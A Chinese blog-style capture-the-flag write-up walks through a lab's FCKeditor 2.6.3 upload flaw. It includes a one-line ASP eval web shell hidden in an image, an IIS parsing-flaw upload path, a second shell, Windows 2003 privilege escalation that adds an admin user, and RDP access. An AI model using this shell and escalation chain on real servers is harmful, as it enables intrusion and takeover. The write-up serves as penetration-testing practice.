白帽学院靶场之编辑器的奥秘(二)

       接着昨晚的写。来到了第六关。
       第六关的提示如下,这一关找flag的时候duang了一下。
白帽学院靶场之编辑器的奥秘(二)_第1张图片
       首先查看编辑器的版本信息。是FCKeditor的2.6.3版本。
白帽学院靶场之编辑器的奥秘(二)_第2张图片
       然后在网上找到有关fck编辑器的漏洞利用信息。提示了samples。从下面的信息中找到突破口。
白帽学院靶场之编辑器的奥秘(二)_第3张图片
白帽学院靶场之编辑器的奥秘(二)_第4张图片
白帽学院靶场之编辑器的奥秘(二)_第5张图片

       拿到flag06:d04jnfhduya3n1ld
       实际上远程主机上有一些工具已经备好。如Pker的地址:
C:\Documents and Settings\siny\桌面\Pker多线程后台极速扫描工具\Pker多线程后台极速扫描工具
       再往后就是点击上传图片栏,上传登录的远程主机上的1.jpg一句话图片马,其内容是<%eval request(“siny”)%>,将其上传到shell.asp文件夹下,利用IIS的解析漏洞实现利用。
白帽学院靶场之编辑器的奥秘(二)_第6张图片
                    白帽学院靶场之编辑器的奥秘(二)_第7张图片
白帽学院靶场之编辑器的奥秘(二)_第8张图片

       访问是空白,表明已经成功了。接着用菜刀去连接。一句话地址如下:
http://192.168.2.2/uploadfile/image/shell.asp/2016030903493348.jpg
白帽学院靶场之编辑器的奥秘(二)_第9张图片

       得到flag07的值。flag07: ca20db309e056e3d
白帽学院靶场之编辑器的奥秘(二)_第10张图片

       最后一个flag是2.2的主机名。使用菜刀的终端,提示没有权限。又在远程主机上找到了siny的大马,2333.cer。上传上去。使用菜刀浏览目录时看到了C:\RECYCLER里的1cmd.exe和pr.exe文件。
白帽学院靶场之编辑器的奥秘(二)_第11张图片
       直接在cmd下查看主机名。填入答题框内,提示错误,索性就提权服务器,直接在服务器里搞了。
白帽学院靶场之编辑器的奥秘(二)_第12张图片

       里面上传好的pr.exe不好使,自己上传了一个巴西烤肉上去提权。king/998
      巴西烤肉的提权原理是利用Windows2003系统下的一个本地提权漏洞,通过此工具可以用SYSTEM权限执行命令,从而可以达到添加用户的目的。觉得这样一条条执行麻烦,也可以将添加新用户和提升管理员权限使用&&连接同时执行。
白帽学院靶场之编辑器的奥秘(二)_第13张图片
白帽学院靶场之编辑器的奥秘(二)_第14张图片
                    白帽学院靶场之编辑器的奥秘(二)_第15张图片

       扫描端口,发现开启了3389,那就直接连吧。
白帽学院靶场之编辑器的奥秘(二)_第16张图片
       进来后查看计算机名。f02dea5d5d0b9315,这个才是真正的flag08。
         白帽学院靶场之编辑器的奥秘(二)_第17张图片
白帽学院靶场之编辑器的奥秘(二)_第18张图片
       在登录的远程2.2主机上查看其主机名,仍然不同。原因我也实验了一下,是因为计算机的NetBIOS名称字符限制为15个,而完整计算机名可以自行修改并且重启后生效。出题者在这里动了点手脚。
白帽学院靶场之编辑器的奥秘(二)_第19张图片
       至此,该靶场本次渗透到此结束。o-|-o

你可能感兴趣的:(渗透测试)